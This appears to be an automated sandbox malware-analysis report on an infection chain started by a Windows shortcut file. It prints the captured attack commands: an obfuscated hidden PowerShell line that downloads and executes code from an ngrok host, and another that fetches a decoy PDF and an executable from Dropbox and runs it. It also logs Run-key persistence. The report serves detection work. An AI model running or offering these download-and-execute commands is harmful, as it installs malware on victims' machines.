                      Source: Binary string: wkernelbase.pdb source: 1061714629.exe, 00000022.00000003.1900857144.00000000030D0000.00000004.00000001.00020000.00000000.sdmp, 1061714629.exe, 00000022.00000003.1900624888.0000000002EB0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000023.00000003.1907247856.00000000052F0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdb source: 1061714629.exe, 00000022.00000003.1898574674.0000000002EB0000.00000004.00000001.00020000.00000000.sdmp, 1061714629.exe, 00000022.00000003.1898813591.00000000030A0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000023.00000003.1905492118.00000000054E0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: 1061714629.exe, 00000022.00000003.1899664093.0000000003050000.00000004.00000001.00020000.00000000.sdmp, 1061714629.exe, 00000022.00000003.1899186910.0000000002EB0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000023.00000003.1905951315.00000000052F0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000023.00000003.1906206963.0000000005490000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdbUGP source: 1061714629.exe, 00000022.00000003.1898574674.0000000002EB0000.00000004.00000001.00020000.00000000.sdmp, 1061714629.exe, 00000022.00000003.1898813591.00000000030A0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000023.00000003.1905492118.00000000054E0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: 1061714629.exe, 00000022.00000003.1899664093.0000000003050000.00000004.00000001.00020000.00000000.sdmp, 1061714629.exe, 00000022.00000003.1899186910.0000000002EB0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000023.00000003.1905951315.00000000052F0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000023.00000003.1906206963.0000000005490000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernelbase.pdbUGP source: 1061714629.exe, 00000022.00000003.1900857144.00000000030D0000.00000004.00000001.00020000.00000000.sdmp, 1061714629.exe, 00000022.00000003.1900624888.0000000002EB0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000023.00000003.1907247856.00000000052F0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernel32.pdbUGP source: 1061714629.exe, 00000022.00000003.1899986136.0000000002EB0000.00000004.00000001.00020000.00000000.sdmp, 1061714629.exe, 00000022.00000003.1900088763.0000000002FD0000.00000004.00000001.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      Detected unpacking (creates a PE file in dynamic memory)
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeUnpacked PE file: 31.2.1061714629.exe.2440000.2.unpack
                      PowerShell case anomaly found
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 29ca71 curl ; sal a4a9b9 iEx ; a4a9b9(29ca71 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/147a893e0e699b17117c599fde51f7ef -UseBasicParsing)
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 29ca71 curl ; sal a4a9b9 iEx ; a4a9b9(29ca71 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/147a893e0e699b17117c599fde51f7ef -UseBasicParsing)
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 29ca71 curl ; sal a4a9b9 iEx ; a4a9b9(29ca71 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/147a893e0e699b17117c599fde51f7ef -UseBasicParsing)Jump to behavior
                      Suspicious powershell command line found
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 29ca71 curl ; sal a4a9b9 iEx ; a4a9b9(29ca71 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/147a893e0e699b17117c599fde51f7ef -UseBasicParsing)
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/qzqf3fr40w71dq8uwcnec/runner.exe?rlkey=dfl8hxamjpp5zdy8yzn5ejrol&dl=1' -OutFile $RandomEXE ; start $RandomEXE"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 29ca71 curl ; sal a4a9b9 iEx ; a4a9b9(29ca71 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/147a893e0e699b17117c599fde51f7ef -UseBasicParsing)Jump to behavior
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/qzqf3fr40w71dq8uwcnec/runner.exe?rlkey=dfl8hxamjpp5zdy8yzn5ejrol&dl=1' -OutFile $RandomEXE ; start $RandomEXE"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/qzqf3fr40w71dq8uwcnec/runner.exe?rlkey=dfl8hxamjpp5zdy8yzn5ejrol&dl=1' -OutFile $RandomEXE ; start $RandomEXE"
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: 31_2_004D7960 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,31_2_004D7960
                      Source: 1061714629.exe.17.drStatic PE information: real checksum: 0x241059 should be: 0x2b1ae9
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFAAB794300 push eax; ret 4_2_00007FFAAB79430D
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: 31_2_004CA770 push eax; ret 31_2_004CA784
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: 31_2_004CA770 push eax; ret 31_2_004CA7AC
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: 34_3_007AB86D push ebx; ret 34_3_007AB864
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: 34_3_007AA840 push ebp; retf 34_3_007AA841
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: 34_3_007AE83C pushad ; ret 34_3_007AE841
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: 34_3_007AE80E push eax; iretd 34_3_007AE81D
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: 34_3_007AA0F9 push FFFFFF82h; iretd 34_3_007AA0FB
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: 34_3_007AD8A0 push 0000002Eh; iretd 34_3_007AD8A2
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: 34_3_007A8904 push ecx; ret 34_3_007A8917
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: 34_3_007AB1DD push eax; ret 34_3_007AB1DF
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: 34_3_007AE586 pushad ; retf 34_3_007AE599
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: 34_3_007A9F6A push eax; ret 34_3_007A9F75
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: 34_3_007AB70B push ebx; ret 34_3_007AB864
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: 34_2_004381E0 push ecx; retf 34_2_004382AC
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: 34_2_004381A0 push ecx; retf 34_2_004382AC
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: 34_2_004CA770 push eax; ret 34_2_004CA784
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: 34_2_004CA770 push eax; ret 34_2_004CA7AC
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: 34_2_00434C60 push edi; retf 34_2_00434D5F
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: 34_2_00434CF0 push edi; retf 34_2_00434D5F
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: 34_2_00434C90 push edi; retf 34_2_00434D5F
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: 34_2_00434CB0 push edi; retf 34_2_00434D5F
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: 34_2_00447D60 push ecx; retf 34_2_00447E0D
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: 34_2_00436DB0 push ecx; retf 34_2_00436EEF
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 35_3_02D118C0 push ebp; retf 35_3_02D118C1
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 35_3_02D128ED push ebx; ret 35_3_02D128E4
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 35_3_02D1588E push eax; iretd 35_3_02D1589D
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 35_3_02D158BC pushad ; ret 35_3_02D158C1
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 35_3_02D1225D push eax; ret 35_3_02D1225F
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 35_3_02D16012 push 00000038h; iretd 35_3_02D1601D
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 35_3_02D15606 pushad ; retf 35_3_02D15619

                      Persistence and Installation Behavior

                      barindex
                      Windows shortcut file (LNK) starts blacklisted processes
                      Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
                      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
                      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
                      Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
                      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
                      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeFile created: C:\Users\user\Videos\DiskTuner\Bin\DiskTuner.exeJump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\1061714629.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DiskTuner
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DiskTuner

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Loading BitLocker PowerShell Module
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1061714629.exeCode function: 31_2_004D7960 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,31_2_004D7960
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
